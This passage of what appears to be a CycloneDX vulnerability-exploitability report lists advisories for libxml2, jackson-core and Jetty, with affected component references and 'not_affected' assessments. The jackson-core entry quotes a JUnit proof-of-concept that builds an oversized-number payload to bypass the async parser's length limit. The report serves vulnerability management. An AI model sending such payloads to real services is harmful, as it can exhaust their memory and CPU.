          "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:ec223d43-28db-4f2d-88e3-d2015266ad6e/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_7?arch=x86_64&distro=redhat-9.7"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "",
        "response": [
          "update"
        ],
        "detail": null
      }
    },
    {
      "id": "GHSA-72hv-8253-57qq",
      "source": {
        "name": "ghsa",
        "url": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Amaven"
      },
      "ratings": [],
      "description": "### Summary\nThe non-blocking (async) JSON parser in `jackson-core` bypasses the `maxNumberLength` constraint (default: 1000 characters) defined in `StreamReadConstraints`. This allows an attacker to send JSON with arbitrarily long numbers through the async parser API, leading to excessive memory allocation and potential CPU exhaustion, resulting in a Denial of Service (DoS).\n\nThe standard synchronous parser correctly enforces this limit, but the async parser fails to do so, creating an inconsistent enforcement policy.\n\n### Details\nThe root cause is that the async parsing path in `NonBlockingUtf8JsonParserBase` (and related classes) does not call the methods responsible for number length validation.\n\n- The number parsing methods (e.g., `_finishNumberIntegralPart`) accumulate digits into the `TextBuffer` without any length checks.\n- After parsing, they call `_valueComplete()`, which finalizes the token but does **not** call `resetInt()` or `resetFloat()`.\n- The `resetInt()`/`resetFloat()` methods in `ParserBase` are where the `validateIntegerLength()` and `validateFPLength()` checks are performed.\n- Because this validation step is skipped, the `maxNumberLength` constraint is never enforced in the async code path.\n\n### PoC\nThe following JUnit 5 test demonstrates the vulnerability. 
It shows that the async parser accepts a 5,000-digit number, whereas the limit should be 1,000.\n\n```java\npackage tools.jackson.core.unittest.dos;\n\nimport java.nio.charset.StandardCharsets;\n\nimport org.junit.jupiter.api.Test;\n\nimport tools.jackson.core.*;\nimport tools.jackson.core.exc.StreamConstraintsException;\nimport tools.jackson.core.json.JsonFactory;\nimport tools.jackson.core.json.async.NonBlockingByteArrayJsonParser;\n\nimport static org.junit.jupiter.api.Assertions.*;\n\n/**\n * POC: Number Length Constraint Bypass in Non-Blocking (Async) JSON Parsers\n *\n * Authors: sprabhav7, rohan-repos\n * \n * maxNumberLength default = 1000 characters (digits).\n * A number with more than 1000 digits should be rejected by any parser.\n *\n * BUG: The async parser never calls resetInt()/resetFloat() which is where\n * validateIntegerLength()/validateFPLength() lives. Instead it calls\n * _valueComplete() which skips all number length validation.\n *\n * CWE-770: Allocation of Resources Without Limits or Throttling\n */\nclass AsyncParserNumberLengthBypassTest {\n\n    private static final int MAX_NUMBER_LENGTH = 1000;\n    private static final int TEST_NUMBER_LENGTH = 5000;\n\n    private final JsonFactory factory = new JsonFactory();\n\n    // CONTROL: Sync parser correctly rejects a number exceeding maxNumberLength\n    @Test\n    void syncParserRejectsLongNumber() throws Exception {\n        byte[] payload = buildPayloadWithLongInteger(TEST_NUMBER_LENGTH);\n\t\t\n\t\t// Output to console\n        System.out.println(\"[SYNC] Parsing \" + TEST_NUMBER_LENGTH + \"-digit number (limit: \" + MAX_NUMBER_LENGTH + \")\");\n        try {\n            try (JsonParser p = factory.createParser(ObjectReadContext.empty(), payload)) {\n                while (p.nextToken() != null) {\n                    if (p.currentToken() == JsonToken.VALUE_NUMBER_INT) {\n                        System.out.println(\"[SYNC] Accepted number with \" + p.getText().length() + \" digits 
\u2014 UNEXPECTED\");\n                    }\n                }\n            }\n            fail(\"Sync parser must reject a \" + TEST_NUMBER_LENGTH + \"-digit number\");\n        } catch (StreamConstraintsException e) {\n            System.out.println(\"[SYNC] Rejected with StreamConstraintsException: \" + e.getMessage());\n        }\n    }\n\n    // VULNERABILITY: Async parser accepts the SAME number that sync rejects\n    @Test\n    void asyncParserAcceptsLongNumber() throws Exception {\n        byte[] payload = buildPayloadWithLongInteger(TEST_NUMBER_LENGTH);\n\n        NonBlockingByteArrayJsonParser p =\n            (NonBlockingByteArrayJsonParser) factory.createNonBlockingByteArrayParser(ObjectReadContext.empty());\n        p.feedInput(payload, 0, payload.length);\n        p.endOfInput();\n\n        boolean foundNumber = false;\n        try {\n            while (p.nextToken() != null) {\n                if (p.currentToken() == JsonToken.VALUE_NUMBER_INT) {\n                    foundNumber = true;\n                    String numberText = p.getText();\n                    assertEquals(TEST_NUMBER_LENGTH, numberText.length(),\n                        \"Async parser silently accepted all \" + TEST_NUMBER_LENGTH + \" digits\");\n                }\n            }\n            // Output to console\n            System.out.println(\"[ASYNC INT] Accepted number with \" + TEST_NUMBER_LENGTH + \" digits \u2014 BUG CONFIRMED\");\n            assertTrue(foundNumber, \"Parser should have produced a VALUE_NUMBER_INT token\");\n        } catch (StreamConstraintsException e) {\n            fail(\"Bug is fixed \u2014 async parser now correctly rejects long numbers: \" + e.getMessage());\n        }\n        p.close();\n    }\n\n    private byte[] buildPayloadWithLongInteger(int numDigits) {\n        StringBuilder sb = new StringBuilder(numDigits + 10);\n        sb.append(\"{\\\"v\\\":\");\n        for (int i = 0; i < numDigits; i++) {\n            sb.append((char) ('1' + (i % 
9)));\n        }\n        sb.append('}');\n        return sb.toString().getBytes(StandardCharsets.UTF_8);\n    }\n}\n\n```\n\n\n### Impact\nA malicious actor can send a JSON document with an arbitrarily long number to an application using the async parser (e.g., in a Spring WebFlux or other reactive application). This can cause:\n1.  **Memory Exhaustion:** Unbounded allocation of memory in the `TextBuffer` to store the number's digits, leading to an `OutOfMemoryError`.\n2.  **CPU Exhaustion:** If the application subsequently calls `getBigIntegerValue()` or `getDecimalValue()`, the JVM can be tied up in O(n^2) `BigInteger` parsing operations, leading to a CPU-based DoS.\n\n### Suggested Remediation\n\nThe async parsing path should be updated to respect the `maxNumberLength` constraint. The simplest fix appears to ensure that `_valueComplete()` or a similar method in the async path calls the appropriate validation methods (`resetInt()` or `resetFloat()`) already present in `ParserBase`, mirroring the behavior of the synchronous parsers.\n\n**NOTE:** This research was performed in collaboration with [rohan-repos](https://github.com/rohan-repos)",
      "recommendation": "Upgrade com.fasterxml.jackson.core:jackson-core to version 2.21.1, 2.18.6",
      "advisories": [
        {
          "url": "https://github.com/advisories/GHSA-72hv-8253-57qq"
        },
        {
          "url": "https://github.com/FasterXML/jackson-core"
        },
        {
          "url": "https://github.com/FasterXML/jackson-core/commit/b0c428e6f993e1b5ece5c1c3cb2523e887cd52cf"
        },
        {
          "url": "https://github.com/FasterXML/jackson-core/pull/1555"
        },
        {
          "url": "https://github.com/FasterXML/jackson-core/security/advisories/GHSA-72hv-8253-57qq"
        }
      ],
      "published": "2026-02-28T02:01:05+00:00",
      "updated": "2026-04-07T16:30:17+00:00",
      "affects": [
        {
          "ref": "pkg:maven/com.fasterxml.jackson.core/jackson-core@2.19.0",
          "versions": [
            {
              "version": "2.19.0",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:maven/com.fasterxml.jackson.core/jackson-core@2.19.4",
          "versions": [
            {
              "version": "2.19.4",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:5ddfd767-95ac-4f7a-9a8e-63a6d71d5c04/1#68bd507c-329a-4836-9ba3-7974c6d6f083"
        },
        {
          "ref": "urn:cdx:5ddfd767-95ac-4f7a-9a8e-63a6d71d5c04/1#pkg:maven/com.fasterxml.jackson.core/jackson-core@2.19.4"
        },
        {
          "ref": "urn:cdx:be506ec7-64a4-45ee-ad51-ad54726720fb/1#303ffe70-0534-468c-8e33-40566f1de1ad"
        },
        {
          "ref": "urn:cdx:be506ec7-64a4-45ee-ad51-ad54726720fb/1#pkg:maven/com.fasterxml.jackson.core/jackson-core@2.19.4"
        },
        {
          "ref": "urn:cdx:40f481a1-05ad-42d9-bc87-35853821083f/1#pkg:maven/com.fasterxml.jackson.core/jackson-core@2.19.0"
        },
        {
          "ref": "urn:cdx:dab14c2a-4bad-4686-8d63-e41f17d16828/1#pkg:maven/com.fasterxml.jackson.core/jackson-core@2.19.0"
        },
        {
          "ref": "urn:cdx:93a4fa62-d367-4223-8767-f8e30d5965ba/1#pkg:maven/com.fasterxml.jackson.core/jackson-core@2.19.0"
        },
        {
          "ref": "urn:cdx:93a4fa62-d367-4223-8767-f8e30d5965ba/1#pkg:maven/com.fasterxml.jackson.core/jackson-core@2.19.4"
        },
        {
          "ref": "urn:cdx:61f37057-a39d-4979-b92c-7080941e330f/1#pkg:maven/com.fasterxml.jackson.core/jackson-core@2.19.0"
        },
        {
          "ref": "urn:cdx:61f37057-a39d-4979-b92c-7080941e330f/1#pkg:maven/com.fasterxml.jackson.core/jackson-core@2.19.4"
        },
        {
          "ref": "urn:cdx:b5054fdf-8701-40fa-bada-ab5917185205/1#pkg:maven/com.fasterxml.jackson.core/jackson-core@2.19.0"
        },
        {
          "ref": "urn:cdx:1e59dc1b-6b11-4d3e-80e8-4b1d3b1a2992/1#pkg:maven/com.fasterxml.jackson.core/jackson-core@2.19.0"
        },
        {
          "ref": "urn:cdx:17b63bf1-a7f6-476f-9af1-58e45e17a6a7/1#pkg:maven/com.fasterxml.jackson.core/jackson-core@2.19.4"
        },
        {
          "ref": "urn:cdx:9cfedadb-581e-44dd-adca-95d605fbe99a/1#pkg:maven/com.fasterxml.jackson.core/jackson-core@2.19.4"
        },
        {
          "ref": "urn:cdx:9f54a881-960e-4b34-8bf1-8acdf345d78b/1#7b43061a-89fa-4de5-845d-d1f1d20c730b"
        },
        {
          "ref": "urn:cdx:ba8e630c-da17-4b7e-8f33-d3622b38b35d/1#07faab44-cb55-465d-8d17-371b44a360eb"
        },
        {
          "ref": "urn:cdx:34e5c353-2a48-4fe2-805f-8f192280376d/1#pkg:maven/com.fasterxml.jackson.core/jackson-core@2.19.0"
        },
        {
          "ref": "urn:cdx:ba2db0a6-0fda-4646-81f2-1b48896717af/1#pkg:maven/com.fasterxml.jackson.core/jackson-core@2.19.0"
        },
        {
          "ref": "urn:cdx:f1046be3-21d4-4602-a45e-8d7bbd5ede4c/1#pkg:maven/com.fasterxml.jackson.core/jackson-core@2.19.0"
        },
        {
          "ref": "urn:cdx:85012461-0171-46d4-b75a-e71dcc2117f5/1#pkg:maven/com.fasterxml.jackson.core/jackson-core@2.19.0"
        },
        {
          "ref": "urn:cdx:8cf291f3-05bb-4e0b-a249-a73e0b463443/1#pkg:maven/com.fasterxml.jackson.core/jackson-core@2.19.0"
        },
        {
          "ref": "urn:cdx:2a312645-fb3d-4dcf-be6b-1432511b1648/1#pkg:maven/com.fasterxml.jackson.core/jackson-core@2.19.0"
        },
        {
          "ref": "urn:cdx:5096b213-a837-458f-a78b-26c07c86ed20/1#pkg:maven/com.fasterxml.jackson.core/jackson-core@2.19.0"
        },
        {
          "ref": "urn:cdx:3e924595-06db-4218-b256-abeb1a7d8834/1#pkg:maven/com.fasterxml.jackson.core/jackson-core@2.19.0"
        },
        {
          "ref": "urn:cdx:09d804de-d5c5-4d02-90a1-7d8abeb32523/1#pkg:maven/com.fasterxml.jackson.core/jackson-core@2.19.0"
        },
        {
          "ref": "urn:cdx:8342b19d-38af-4e7e-9c49-2fb5f7c32324/1#pkg:maven/com.fasterxml.jackson.core/jackson-core@2.19.0"
        },
        {
          "ref": "urn:cdx:d55d166c-3f45-4aff-8bc1-1aa77d03af92/1#064f20f7-d3eb-48f9-a477-23fb1138d888"
        },
        {
          "ref": "urn:cdx:7ea40305-a30e-4dd7-9e8b-6a3782e6f49f/1#01e40fee-9cd7-4cf4-a11a-3ef036d808d4"
        },
        {
          "ref": "urn:cdx:d2ec2826-78ec-4c56-a564-c63b053a699d/1#pkg:maven/com.fasterxml.jackson.core/jackson-core@2.19.0"
        },
        {
          "ref": "urn:cdx:07dd3b3b-2b52-47fc-9b7a-b9d0cbf3ed33/1#pkg:maven/com.fasterxml.jackson.core/jackson-core@2.19.0"
        },
        {
          "ref": "urn:cdx:7e21f33a-3847-47ee-ae0b-7461eb412c56/1#05cbbea0-f240-4bbc-a340-babfd2e02dee"
        },
        {
          "ref": "urn:cdx:9fa01ca3-7e73-483f-9720-339201fc0998/1#1b1e9580-f819-4bbf-bb05-ccc7d88c90c0"
        },
        {
          "ref": "urn:cdx:c6a63ec3-f4d4-4b15-8ded-4a99e47a4489/1#pkg:maven/com.fasterxml.jackson.core/jackson-core@2.19.4"
        },
        {
          "ref": "urn:cdx:c28aa302-c487-4fc8-a148-6be94565cf4f/1#pkg:maven/com.fasterxml.jackson.core/jackson-core@2.19.4"
        },
        {
          "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#pkg:maven/com.fasterxml.jackson.core/jackson-core@2.19.0"
        },
        {
          "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#pkg:maven/com.fasterxml.jackson.core/jackson-core@2.19.4"
        },
        {
          "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:maven/com.fasterxml.jackson.core/jackson-core@2.19.0"
        },
        {
          "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:maven/com.fasterxml.jackson.core/jackson-core@2.19.0"
        },
        {
          "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#1804ea1e-3e80-4e5b-add5-e3d63781036e"
        },
        {
          "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#pkg:maven/com.fasterxml.jackson.core/jackson-core@2.19.4"
        },
        {
          "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#229f8756-c882-46d8-8784-7ef81cc3537a"
        },
        {
          "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#pkg:maven/com.fasterxml.jackson.core/jackson-core@2.19.4"
        },
        {
          "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#pkg:maven/com.fasterxml.jackson.core/jackson-core@2.19.0"
        },
        {
          "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#pkg:maven/com.fasterxml.jackson.core/jackson-core@2.19.4"
        },
        {
          "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#301a8979-de46-445e-a607-0e0d58d56d5f"
        },
        {
          "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:maven/com.fasterxml.jackson.core/jackson-core@2.19.4"
        },
        {
          "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#20a5f32e-ecbb-44b0-85a5-7bdab82d6029"
        },
        {
          "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:maven/com.fasterxml.jackson.core/jackson-core@2.19.4"
        },
        {
          "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#44f2275f-7782-4995-ade9-23fd56d6935d"
        },
        {
          "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#7524504f-afd9-4e9f-aeba-78ab9f4d77c6"
        },
        {
          "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#b5568339-d548-4c15-8879-7baff6d70130"
        },
        {
          "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#0620fb18-d0fa-486f-be09-c7d2902e26ef"
        },
        {
          "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#pkg:maven/com.fasterxml.jackson.core/jackson-core@2.19.4"
        },
        {
          "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#8018e9cf-9cf9-476d-8d3b-8e25e4b11258"
        },
        {
          "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#pkg:maven/com.fasterxml.jackson.core/jackson-core@2.19.4"
        },
        {
          "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#b3d2ce3c-c7ec-45b4-a7af-a6172088df81"
        },
        {
          "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#pkg:maven/com.fasterxml.jackson.core/jackson-core@2.19.4"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the context of Confluent Platform. The async parser is not used in Confluent Platform components. "
      }
    },
    {
      "id": "CVE-2025-11143",
      "source": {
        "name": "ghsa",
        "url": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Amaven"
      },
      "ratings": [
        {
          "source": {
            "name": "ghsa"
          },
          "score": 3.7,
          "severity": "low",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 6.5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 3.7,
          "severity": "low",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N"
        }
      ],
      "cwes": [
        20
      ],
      "description": "The Jetty URI parser has some key differences to other common parsers when evaluating invalid or unusual URIs.\u00a0Differential parsing of URIs in systems using multiple components may result in security by-pass. For example a component that enforces a black list may interpret the URIs differently from one that generates a response.\u00a0At the very least, differential parsing may divulge implementation details.",
      "recommendation": "Upgrade org.eclipse.jetty:jetty-http to version 12.0.31, 12.1.5",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2025-11143"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2025-11143"
        },
        {
          "url": "https://github.com/jetty/jetty.project"
        },
        {
          "url": "https://github.com/jetty/jetty.project/security/advisories/GHSA-wjpw-4j6x-6rwh"
        },
        {
          "url": "https://github.com/user-attachments/files/22222625/Java.Eclipse.Jetty.Report_.Incorrect.Parsing.Priority.of.the.IPv6.Hostname.Delimeter.pdf"
        },
        {
          "url": "https://github.com/user-attachments/files/22222626/Java.Eclipse.Jetty.Report_.The.Parsing.Priority.of.the.Delimiter.pdf"
        },
        {
          "url": "https://github.com/user-attachments/files/22222627/Java.Eclipse.Jetty.Report_.Parsing.Difference.Due.to.Deformed.Scheme.pdf"
        },
        {
          "url": "https://github.com/user-attachments/files/22222630/Java.Eclipse.Jetty.Report_.Improper.IPv4-mapped.IPv6.Parsing.pdf"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-11143"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2025-11143"
        }
      ],
      "published": "2026-03-05T10:15:54+00:00",
      "updated": "2026-03-06T20:30:58+00:00",
      "affects": [
        {
          "ref": "pkg:maven/org.eclipse.jetty/jetty-http@12.0.25",
          "versions": [
            {
              "version": "12.0.25",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:maven/org.eclipse.jetty/jetty-http@12.0.25",
          "versions": [
            {
              "version": "12.0.25",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:maven/org.eclipse.jetty/jetty-http@12.0.25",
          "versions": [
            {
              "version": "12.0.25",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:maven/org.eclipse.jetty/jetty-http@12.0.25",
          "versions": [
            {
              "version": "12.0.25",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:5ddfd767-95ac-4f7a-9a8e-63a6d71d5c04/1#1edb018d-a2a4-42d7-bd98-26ff4c1eebaa"
        },
        {
          "ref": "urn:cdx:5ddfd767-95ac-4f7a-9a8e-63a6d71d5c04/1#1edb018d-a2a4-42d7-bd98-26ff4c1eebaa"
        },
        {
          "ref": "urn:cdx:5ddfd767-95ac-4f7a-9a8e-63a6d71d5c04/1#1edb018d-a2a4-42d7-bd98-26ff4c1eebaa"
        },
        {
          "ref": "urn:cdx:5ddfd767-95ac-4f7a-9a8e-63a6d71d5c04/1#1edb018d-a2a4-42d7-bd98-26ff4c1eebaa"
        },
        {
          "ref": "urn:cdx:be506ec7-64a4-45ee-ad51-ad54726720fb/1#070b900b-71e6-44bd-a62d-8c77ef4e02c9"
        },
        {
          "ref": "urn:cdx:be506ec7-64a4-45ee-ad51-ad54726720fb/1#070b900b-71e6-44bd-a62d-8c77ef4e02c9"
        },
        {
          "ref": "urn:cdx:be506ec7-64a4-45ee-ad51-ad54726720fb/1#070b900b-71e6-44bd-a62d-8c77ef4e02c9"
        },
        {
          "ref": "urn:cdx:be506ec7-64a4-45ee-ad51-ad54726720fb/1#070b900b-71e6-44bd-a62d-8c77ef4e02c9"
        },
        {
          "ref": "urn:cdx:40f481a1-05ad-42d9-bc87-35853821083f/1#pkg:maven/org.eclipse.jetty/jetty-http@12.0.25"
        },
        {
          "ref": "urn:cdx:40f481a1-05ad-42d9-bc87-35853821083f/1#pkg:maven/org.eclipse.jetty/jetty-http@12.0.25"
        },
        {
          "ref": "urn:cdx:40f481a1-05ad-42d9-bc87-35853821083f/1#pkg:maven/org.eclipse.jetty/jetty-http@12.0.25"
        },
        {
          "ref": "urn:cdx:40f481a1-05ad-42d9-bc87-35853821083f/1#pkg:maven/org.eclipse.jetty/jetty-http@12.0.25"
        },
        {
          "ref": "urn:cdx:dab14c2a-4bad-4686-8d63-e41f17d16828/1#pkg:maven/org.eclipse.jetty/jetty-http@12.0.25"
        },
        {
          "ref": "urn:cdx:dab14c2a-4bad-4686-8d63-e41f17d16828/1#pkg:maven/org.eclipse.jetty/jetty-http@12.0.25"
        },
        {
          "ref": "urn:cdx:dab14c2a-4bad-4686-8d63-e41f17d16828/1#pkg:maven/org.eclipse.jetty/jetty-http@12.0.25"
        },
        {
          "ref": "urn:cdx:dab14c2a-4bad-4686-8d63-e41f17d16828/1#pkg:maven/org.eclipse.jetty/jetty-http@12.0.25"
        },
        {
          "ref": "urn:cdx:93a4fa62-d367-4223-8767-f8e30d5965ba/1#pkg:maven/org.eclipse.jetty/jetty-http@12.0.25"
        },
        {
          "ref": "urn:cdx:93a4fa62-d367-4223-8767-f8e30d5965ba/1#pkg:maven/org.eclipse.jetty/jetty-http@12.0.25"
        },
        {
          "ref": "urn:cdx:93a4fa62-d367-4223-8767-f8e30d5965ba/1#pkg:maven/org.eclipse.jetty/jetty-http@12.0.25"
        },
        {
          "ref": "urn:cdx:93a4fa62-d367-4223-8767-f8e30d5965ba/1#pkg:maven/org.eclipse.jetty/jetty-http@12.0.25"
        },
        {
          "ref": "urn:cdx:61f37057-a39d-4979-b92c-7080941e330f/1#pkg:maven/org.eclipse.jetty/jetty-http@12.0.25"
        },
        {
          "ref": "urn:cdx:61f37057-a39d-4979-b92c-7080941e330f/1#pkg:maven/org.eclipse.jetty/jetty-http@12.0.25"
        },
        {
          "ref": "urn:cdx:61f37057-a39d-4979-b92c-7080941e330f/1#pkg:maven/org.eclipse.jetty/jetty-http@12.0.25"
        },
        {
          "ref": "urn:cdx:61f37057-a39d-4979-b92c-7080941e330f/1#pkg:maven/org.eclipse.jetty/jetty-http@12.0.25"
        },
        {
          "ref": "urn:cdx:17b63bf1-a7f6-476f-9af1-58e45e17a6a7/1#pkg:maven/org.eclipse.jetty/jetty-http@12.0.25"
        },
        {
          "ref": "urn:cdx:17b63bf1-a7f6-476f-9af1-58e45e17a6a7/1#pkg:maven/org.eclipse.jetty/jetty-http@12.0.25"
        },
        {
          "ref": "urn:cdx:17b63bf1-a7f6-476f-9af1-58e45e17a6a7/1#pkg:maven/org.eclipse.jetty/jetty-http@12.0.25"
        },
        {
          "ref": "urn:cdx:17b63bf1-a7f6-476f-9af1-58e45e17a6a7/1#pkg:maven/org.eclipse.jetty/jetty-http@12.0.25"
        },
        {
          "ref": "urn:cdx:9cfedadb-581e-44dd-adca-95d605fbe99a/1#pkg:maven/org.eclipse.jetty/jetty-http@12.0.25"
        },
        {
          "ref": "urn:cdx:9cfedadb-581e-44dd-adca-95d605fbe99a/1#pkg:maven/org.eclipse.jetty/jetty-http@12.0.25"
        },
        {
          "ref": "urn:cdx:9cfedadb-581e-44dd-adca-95d605fbe99a/1#pkg:maven/org.eclipse.jetty/jetty-http@12.0.25"
        },
        {
          "ref": "urn:cdx:9cfedadb-581e-44dd-adca-95d605fbe99a/1#pkg:maven/org.eclipse.jetty/jetty-http@12.0.25"
        },
        {
          "ref": "urn:cdx:9f54a881-960e-4b34-8bf1-8acdf345d78b/1#5403c917-cdc9-4d7b-9db6-ba5dcea8c57e"
        },
        {
          "ref": "urn:cdx:9f54a881-960e-4b34-8bf1-8acdf345d78b/1#5403c917-cdc9-4d7b-9db6-ba5dcea8c57e"
        },
        {
          "ref": "urn:cdx:9f54a881-960e-4b34-8bf1-8acdf345d78b/1#5403c917-cdc9-4d7b-9db6-ba5dcea8c57e"
        },
        {
          "ref": "urn:cdx:9f54a881-960e-4b34-8bf1-8acdf345d78b/1#5403c917-cdc9-4d7b-9db6-ba5dcea8c57e"
        },
        {
          "ref": "urn:cdx:ba8e630c-da17-4b7e-8f33-d3622b38b35d/1#cdf7aedb-2946-46f1-9ec5-259b4e6d6ce4"
        },
        {
          "ref": "urn:cdx:ba8e630c-da17-4b7e-8f33-d3622b38b35d/1#cdf7aedb-2946-46f1-9ec5-259b4e6d6ce4"
        },
        {
          "ref": "urn:cdx:ba8e630c-da17-4b7e-8f33-d3622b38b35d/1#cdf7aedb-2946-46f1-9ec5-259b4e6d6ce4"
        },
        {
          "ref": "urn:cdx:ba8e630c-da17-4b7e-8f33-d3622b38b35d/1#cdf7aedb-2946-46f1-9ec5-259b4e6d6ce4"
        },
        {
          "ref": "urn:cdx:f1046be3-21d4-4602-a45e-8d7bbd5ede4c/1#pkg:maven/org.eclipse.jetty/jetty-http@12.0.25"
        },
        {
          "ref": "urn:cdx:f1046be3-21d4-4602-a45e-8d7bbd5ede4c/1#pkg:maven/org.eclipse.jetty/jetty-http@12.0.25"
        },
        {
          "ref": "urn:cdx:f1046be3-21d4-4602-a45e-8d7bbd5ede4c/1#pkg:maven/org.eclipse.jetty/jetty-http@12.0.25"
        },
        {
          "ref": "urn:cdx:f1046be3-21d4-4602-a45e-8d7bbd5ede4c/1#pkg:maven/org.eclipse.jetty/jetty-http@12.0.25"
        },
        {
          "ref": "urn:cdx:85012461-0171-46d4-b75a-e71dcc2117f5/1#pkg:maven/org.eclipse.jetty/jetty-http@12.0.25"
        },
        {
          "ref": "urn:cdx:85012461-0171-46d4-b75a-e71dcc2117f5/1#pkg:maven/org.eclipse.jetty/jetty-http@12.0.25"
        },
        {
          "ref": "urn:cdx:85012461-0171-46d4-b75a-e71dcc2117f5/1#pkg:maven/org.eclipse.jetty/jetty-http@12.0.25"
        },
        {
          "ref": "urn:cdx:85012461-0171-46d4-b75a-e71dcc2117f5/1#pkg:maven/org.eclipse.jetty/jetty-http@12.0.25"
        },
        {
          "ref": "urn:cdx:8cf291f3-05bb-4e0b-a249-a73e0b463443/1#pkg:maven/org.eclipse.jetty/jetty-http@12.0.25"
        },
        {
          "ref": "urn:cdx:8cf291f3-05bb-4e0b-a249-a73e0b463443/1#pkg:maven/org.eclipse.jetty/jetty-http@12.0.25"
        },
        {
          "ref": "urn:cdx:8cf291f3-05bb-4e0b-a249-a73e0b463443/1#pkg:maven/org.eclipse.jetty/jetty-http@12.0.25"
        },
        {
          "ref": "urn:cdx:8cf291f3-05bb-4e0b-a249-a73e0b463443/1#pkg:maven/org.eclipse.jetty/jetty-http@12.0.25"
        },
        {
          "ref": "urn:cdx:2a312645-fb3d-4dcf-be6b-1432511b1648/1#pkg:maven/org.eclipse.jetty/jetty-http@12.0.25"
        },
        {
